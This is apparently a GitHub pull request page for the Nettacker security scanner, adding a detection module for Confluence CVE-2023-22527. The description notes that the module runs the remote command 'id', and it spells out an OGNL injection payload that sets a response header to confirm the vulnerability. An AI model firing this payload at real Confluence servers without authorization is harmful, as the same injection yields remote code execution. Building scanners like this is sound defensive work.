Skip to content

Conversation

@jimmy-ly00
Copy link
Contributor

Checklist

  • I have followed the Contributor Guidelines.
  • The code has been thoroughly tested in my local development environment with flake8 and pylint.
  • The code is Python 3 compatible.
  • The code follows the PEP8 styling guidelines with 4 spaces indentation.
  • This Pull Request relates to only one issue or only one feature
  • I have referenced the corresponding issue number in my commit message
  • I have added the relevant documentation.
  • My branch is up-to-date with the Upstream master branch.

Changes proposed in this pull request

I have added a new module for a vuln module CVE-2023-22527. This code does run RCE command 'id'. If RCE is a no go then I suspect it is possible to use label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',("Vulnerable!")) and it will write the header X-Cmd-Response: Vulnerable! but testing on this has been quite limited.

python3 nettacker.py -i [target] -m confluence_cve_2023_22527_vuln --skip-service-discovery

Your development environment

  • OS: WSL Kali Linux
  • OS Version: Linux 5.15.90.1-microsoft-standard-WSL2
  • Python Version: Python 3.11.6

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants